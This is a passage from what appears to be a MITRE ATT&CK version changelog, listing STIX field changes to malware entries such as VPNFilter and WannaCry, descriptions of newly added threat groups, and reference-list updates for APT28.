external_references[1]['description']Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer. (2017, December 14). Attackers Deploy New ICS Attack Framework “TRITON” and Cause Operational Disruption to Critical Infrastructure. Retrieved January 12, 2018.Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer 2017, December 14 Attackers Deploy New ICS Attack Framework TRITON and Cause Operational Disruption to Critical Infrastructure Retrieved. 2018/01/12
external_references[2]['source_name']Dragos TRISIS Dec 2017DHS CISA February 2019
external_references[2]['description']Dragos. (2017, December 13). TRISIS Malware Analysis of Safety System Targeted Malware. Retrieved January 12, 2018.DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08
external_references[2]['url']https://dragos.com/blog/trisis/TRISIS-01.pdfhttps://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf
external_references[3]['source_name']CISA MAR-17-352-01 HatManDragos December 2017
external_references[3]['description']DHS CISA. (2019, February 27). MAR-17-352-01 HatMan—Safety System Targeted Malware (Update B). Retrieved March 8, 2019.Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12
external_references[3]['url']https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdfhttps://dragos.com/blog/trisis/TRISIS-01.pdf
external_references[4]['source_name']Schneider Electric TRITON Jan 2018Jos Wetzels January 2018
external_references[4]['description']Schneider Electric. (2018, January 23). TRITON - Schneider Electric Analysis and Disclosure. Retrieved March 14, 2019.Jos Wetzels 2018, January 16 Analyzing the TRITON industrial malware Retrieved. 2019/10/22
external_references[4]['url']https://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0shttps://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware
external_references[5]['source_name']Triton - A Report From The Trenches Mar 2019Julian Gutmanis March 2019
external_references[5]['description']Julian Gutmanis. (2019, March 11). Triton - A Report From The Trenches. Retrieved March 11, 2019.Julian Gutmanis 2019, March 11 Triton - A Report From The Trenches Retrieved. 2019/03/11
external_references[6]['source_name']Schneider Electric Dec 2018Schneider December 2018
external_references[6]['description']Schneider Electric. (2018, December 14). Security Notification - EcoStruxure Triconex Tricon V3. Retrieved August 26, 2019.Schneider 2018, December 14 Security Notification EcoStruxure Triconex Tricon V3 Retrieved. 2019/03/08
external_references[7]['source_name']MidnightBlueLabs TRITON Jan 2018Schneider Electric January 2018
external_references[7]['description']Jos Wetzels. (2018, January 16). Analyzing the TRITON industrial malware. Retrieved October 22, 2019.Schneider Electric 2018, January 23 TRITON - Schneider Electric Analysis and Disclosure Retrieved. 2019/03/14
external_references[7]['url']https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malwarehttps://www.youtube.com/watch?v=f09E75bWvkk&index=3&list=PL8OWO1qWXF4qYG19p7An4Vw3N2YZ86aRS&t=0s
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'CISA ICS Advisory (ICSA-18-107-02)', 'description': 'ICS-CERT. (2018, December 18). Advisory (ICSA-18-107-02) - Schneider Electric Triconex Tricon (Update B). Retrieved March 8, 2019.', 'url': 'https://us-cert.cisa.gov/ics/advisories/ICSA-18-107-02'}
external_references{'source_name': 'MITRE CVE-2018-8872', 'description': 'MITRE. (2018, May 04). CVE-2018-8872. Retrieved March 8, 2019.', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-8872'}
external_references{'source_name': 'CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer', 'description': 'Common Weakness Enumeration. (2019, January 03). CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer. Retrieved March 8, 2019.', 'url': 'https://cwe.mitre.org/data/definitions/119.html'}
external_references{'source_name': 'The Office of Nuclear Reactor Regulation', 'description': 'The Office of Nuclear Reactor Regulation. (n.d.). Triconex Topical Report 7286-545-1. Retrieved May 30, 2018.', 'url': 'https://www.nrc.gov/docs/ML1209/ML120900890.pdf'}
external_references{'source_name': 'MDudek-ICS Triton', 'description': 'MDudek-ICS. (n.d.). TRISIS-TRITON-HATMAN. Retrieved November 3, 2019.', 'url': 'https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library'}

[S1010] VPNFilter

Current version: 1.0


Old Description
New Description
t1[VPNFilter](https://collaborate.mitre.org/attackics/index.pht1[VPNFilter](https://attack.mitre.org/software/S1010) is a mu
>p/Software/S0002) is a multi-stage, modular platform with ve>lti-stage, modular platform with versatile capabilities to s
>rsatile capabilities to support both intelligence-collection>upport both intelligence-collection and destructive cyber at
> and destructive cyber attack operations. VPNFilter modules >tack operations. [VPNFilter](https://attack.mitre.org/softwa
>such as its packet sniffer ('ps') can collect traffic that p>re/S1010) modules such as its packet sniffer ('ps') can coll
>asses through an infected device, allowing the theft of webs>ect traffic that passes through an infected device, allowing
>ite credentials and monitoring of Modbus SCADA protocols.(Ci> the theft of website credentials and monitoring of Modbus S
>tation: Talos VPNFilter Jun 2018)(Citation: VPNFilter Deep D>CADA protocols. (Citation: William Largent June 2018) (Citat
>ive Mar 2019)>ion: Carl Hurd March 2019)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_platforms['Windows']
values_changed
STIX FieldOld valueNew Value
modified2020-01-03 22:01:15.893000+00:002022-10-12 18:30:51.174000+00:00
description[VPNFilter](https://collaborate.mitre.org/attackics/index.php/Software/S0002) is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations. VPNFilter modules such as its packet sniffer ('ps') can collect traffic that passes through an infected device, allowing the theft of website credentials and monitoring of Modbus SCADA protocols.(Citation: Talos VPNFilter Jun 2018)(Citation: VPNFilter Deep Dive Mar 2019)[VPNFilter](https://attack.mitre.org/software/S1010) is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations. [VPNFilter](https://attack.mitre.org/software/S1010) modules such as its packet sniffer ('ps') can collect traffic that passes through an infected device, allowing the theft of website credentials and monitoring of Modbus SCADA protocols. (Citation: William Largent June 2018) (Citation: Carl Hurd March 2019)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Software/S0002https://attack.mitre.org/software/S1010
external_references[1]['source_name']Talos VPNFilter Jun 2018Carl Hurd March 2019
external_references[1]['description']William Largent. (2018, June 06). VPNFilter Update - VPNFilter exploits endpoints, targets new devices. Retrieved March 28, 2019.Carl Hurd 2019, March 26 VPNFilter Deep Dive Retrieved. 2019/03/28
external_references[1]['url']https://blog.talosintelligence.com/2018/06/vpnfilter-update.htmlhttps://www.youtube.com/watch?v=yuZazP22rpI
external_references[2]['source_name']VPNFilter Deep Dive Mar 2019William Largent June 2018
external_references[2]['description']Carl Hurd. (2019, March 26). VPNFilter Deep Dive. Retrieved March 28, 2019.William Largent 2018, June 06 VPNFilter Update - VPNFilter exploits endpoints, targets new devices Retrieved. 2019/03/28
external_references[2]['url']https://www.youtube.com/watch?v=yuZazP22rpIhttps://blog.talosintelligence.com/2018/06/vpnfilter-update.html

[S0366] WannaCry

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['enterprise-attack', 'ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-05-13 22:59:51.283000+00:002022-04-25 14:00:00.188000+00:00

Groups

enterprise-attack

New Groups

[G1007] Aoqin Dragon

Current version: 1.0

Description: [Aoqin Dragon](https://attack.mitre.org/groups/G1007) is a suspected Chinese cyber espionage threat group that has been active since at least 2013. [Aoqin Dragon](https://attack.mitre.org/groups/G1007) has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between [Aoqin Dragon](https://attack.mitre.org/groups/G1007) and UNC94, based on malware, infrastructure, and targets.(Citation: SentinelOne Aoqin Dragon June 2022)


[G0143] Aquatic Panda

Current version: 1.0

Description: [Aquatic Panda](https://attack.mitre.org/groups/G0143) is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, [Aquatic Panda](https://attack.mitre.org/groups/G0143) has primarily targeted entities in the telecommunications, technology, and government sectors.(Citation: CrowdStrike AQUATIC PANDA December 2021)


[G1002] BITTER

Current version: 1.0

Description: [BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)


[G0142] Confucius

Current version: 1.0

Description: [Confucius](https://attack.mitre.org/groups/G0142) is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between [Confucius](https://attack.mitre.org/groups/G0142) and [Patchwork](https://attack.mitre.org/groups/G0040), particularly in their respective custom malware code and targets.(Citation: TrendMicro Confucius APT Feb 2018)(Citation: TrendMicro Confucius APT Aug 2021)(Citation: Uptycs Confucius APT Jan 2021)


[G1011] EXOTIC LILY

Current version: 1.0

Description: [EXOTIC LILY](https://attack.mitre.org/groups/G1011) is a financially motivated group that has been closely linked with [Wizard Spider](https://attack.mitre.org/groups/G0102) and the deployment of ransomware including [Conti](https://attack.mitre.org/software/S0575) and [Diavol](https://attack.mitre.org/software/S0659). [EXOTIC LILY](https://attack.mitre.org/groups/G1011) may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.(Citation: Google EXOTIC LILY March 2022)


[G1006] Earth Lusca

Current version: 1.0

Description: [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)


[G1003] Ember Bear

Current version: 1.0

Description: [Ember Bear](https://attack.mitre.org/groups/G1003) is a suspected Russian state-sponsored cyber espionage group that has been active since at least March 2021. [Ember Bear](https://attack.mitre.org/groups/G1003) has primarily focused their operations against Ukraine and Georgia, but has also targeted Western European and North American foreign ministries, pharmaceutical companies, and financial sector organizations. Security researchers assess [Ember Bear](https://attack.mitre.org/groups/G1003) likely conducted the [WhisperGate](https://attack.mitre.org/software/S0689) destructive wiper attacks against Ukraine in early 2022.(Citation: CrowdStrike Ember Bear Profile March 2022)(Citation: Mandiant UNC2589 March 2022)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )


[G0141] Gelsemium

Current version: 1.0

Description: [Gelsemium](https://attack.mitre.org/groups/G0141) is a cyberespionage group that has been active since at least 2014, targeting governmental institutions, electronics manufacturers, universities, and religious organizations in East Asia and the Middle East.(Citation: ESET Gelsemium June 2021)


[G1001] HEXANE

Current version: 2.0

Description: [HEXANE](https://attack.mitre.org/groups/G1001) is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.mitre.org/groups/G1001)'s TTPs appear similar to [APT33](https://attack.mitre.org/groups/G0064) and [OilRig](https://attack.mitre.org/groups/G0049) but due to differences in victims and tools it is tracked as a separate entity.(Citation: Dragos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)


[G1004] LAPSUS$

Current version: 1.0

Description: [LAPSUS$](https://attack.mitre.org/groups/G1004) is cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://attack.mitre.org/groups/G1004) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.(Citation: BBC LAPSUS Apr 2022)(Citation: MSTIC DEV-0537 Mar 2022)(Citation: UNIT 42 LAPSUS Mar 2022)


[G0140] LazyScripter

Current version: 1.0

Description: [LazyScripter](https://attack.mitre.org/groups/G0140) is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.(Citation: MalwareBytes LazyScripter Feb 2021)


[G1009] Moses Staff

Current version: 1.0

Description: [Moses Staff](https://attack.mitre.org/groups/G1009) is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. [Moses Staff](https://attack.mitre.org/groups/G1009) openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim's networks without a ransom demand.(Citation: Checkpoint MosesStaff Nov 2021) Security researchers assess [Moses Staff](https://attack.mitre.org/groups/G1009) is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.(Citation: Cybereason StrifeWater Feb 2022)


[G1005] POLONIUM

Current version: 1.0

Description: [POLONIUM](https://attack.mitre.org/groups/G1005) is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess [POLONIUM](https://attack.mitre.org/groups/G1005) has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.(Citation: Microsoft POLONIUM June 2022)


[G1008] SideCopy

Current version: 1.0

Description: [SideCopy](https://attack.mitre.org/groups/G1008) is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. [SideCopy](https://attack.mitre.org/groups/G1008)'s name comes from its infection chain that tries to mimic that of [Sidewinder](https://attack.mitre.org/groups/G0121), a suspected Indian threat group.(Citation: MalwareBytes SideCopy Dec 2021)

Major Version Changes

[G0007] APT28

Current version: 4.0

Version changed from: 3.2 → 4.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 20:34:03.233000+00:002022-03-16 18:08:13.958000+00:00
external_references[2]['source_name']SNAKEMACKERELIRON TWILIGHT
external_references[2]['description'](Citation: Accenture SNAKEMACKEREL Nov 2018)(Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
external_references[3]['source_name']SwallowtailSNAKEMACKEREL
external_references[3]['description'](Citation: Symantec APT28 Oct 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)
external_references[4]['source_name']Group 74Swallowtail
external_references[4]['description'](Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)
external_references[5]['source_name']SednitGroup 74
external_references[5]['description']This designation has been used in reporting both to refer to the threat group and its associated malware JHUHUGIT.(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)
external_references[6]['source_name']SofacySednit
external_references[6]['description']This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)
external_references[7]['source_name']Pawn StormSofacy
external_references[7]['description'](Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)
external_references[8]['source_name']Fancy BearPawn Storm
external_references[8]['description'](Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)(Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020)
external_references[9]['source_name']STRONTIUMFancy Bear
external_references[9]['description'](Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[10]['source_name']Tsar TeamSTRONTIUM
external_references[10]['description'](Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
external_references[11]['source_name']Threat Group-4127Tsar Team
external_references[11]['description'](Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)
external_references[12]['source_name']TG-4127Threat Group-4127
external_references[13]['source_name']NSA/FBI Drovorub August 2020TG-4127
external_references[13]['description']NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.(Citation: SecureWorks TG-4127)
external_references[14]['source_name']Cybersecurity Advisory GRU Brute Force Campaign July 2021NSA/FBI Drovorub August 2020
external_references[14]['description']NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
external_references[14]['url']https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDFhttps://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF
external_references[15]['source_name']DOJ GRU Indictment Jul 2018Cybersecurity Advisory GRU Brute Force Campaign July 2021
external_references[15]['description']Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
external_references[15]['url']https://www.justice.gov/file/1080281/downloadhttps://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF
external_references[16]['source_name']Ars Technica GRU indictment Jul 2018DOJ GRU Indictment Jul 2018
external_references[16]['description']Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.
external_references[16]['url']https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/https://www.justice.gov/file/1080281/download
external_references[17]['source_name']Crowdstrike DNC June 2016Ars Technica GRU indictment Jul 2018
external_references[17]['description']Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.
external_references[17]['url']https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/
external_references[18]['source_name']FireEye APT28Crowdstrike DNC June 2016
external_references[18]['description']FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
external_references[18]['url']https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdfhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
external_references[19]['source_name']SecureWorks TG-4127FireEye APT28
external_references[19]['description']SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
external_references[19]['url']https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaignhttps://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
external_references[20]['source_name']FireEye APT28 January 2017SecureWorks TG-4127
external_references[20]['description']FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.
external_references[20]['url']https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdfhttps://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign
external_references[21]['source_name']GRIZZLY STEPPE JARFireEye APT28 January 2017
external_references[21]['description']Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.
external_references[21]['url']https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdfhttps://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
external_references[22]['source_name']Sofacy DealersChoiceGRIZZLY STEPPE JAR
external_references[22]['description']Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
external_references[22]['url']https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
external_references[23]['source_name']Palo Alto Sofacy 06-2018Sofacy DealersChoice
external_references[23]['description']Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
external_references[23]['url']https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/
external_references[24]['source_name']Symantec APT28 Oct 2018Palo Alto Sofacy 06-2018
external_references[24]['description']Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
external_references[24]['url']https://www.symantec.com/blogs/election-security/apt28-espionage-military-governmenthttps://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/
external_references[25]['source_name']ESET Zebrocy May 2019Symantec APT28 Oct 2018
external_references[25]['description']ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.
external_references[25]['url']https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/https://www.symantec.com/blogs/election-security/apt28-espionage-military-government
external_references[26]['source_name']US District Court Indictment GRU Oct 2018ESET Zebrocy May 2019
external_references[26]['description']Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
external_references[26]['url']https://www.justice.gov/opa/page/file/1098481/downloadhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/
external_references[27]['source_name']Kaspersky SofacyUS District Court Indictment GRU Oct 2018
external_references[27]['description']Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
external_references[27]['url']https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/https://www.justice.gov/opa/page/file/1098481/download
external_references[28]['source_name']ESET Sednit Part 3Kaspersky Sofacy
external_references[28]['description']ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
external_references[28]['url']http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdfhttps://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
external_references[29]['source_name']Talos Seduploader Oct 2017ESET Sednit Part 3
external_references[29]['description']Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
external_references[29]['url']https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.htmlhttp://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf
external_references[30]['source_name']Securelist Sofacy Feb 2018Talos Seduploader Oct 2017
external_references[30]['description']Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
external_references[30]['url']https://securelist.com/a-slice-of-2017-sofacy-activity/83930/https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html
external_references[31]['source_name']Accenture SNAKEMACKEREL Nov 2018Securelist Sofacy Feb 2018
external_references[31]['description']Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.
external_references[31]['url']https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50https://securelist.com/a-slice-of-2017-sofacy-activity/83930/
external_references[32]['source_name']TrendMicro Pawn Storm Dec 2020Secureworks IRON TWILIGHT Profile
external_references[32]['description']Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.
external_references[32]['url']https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.htmlhttps://www.secureworks.com/research/threat-profiles/iron-twilight
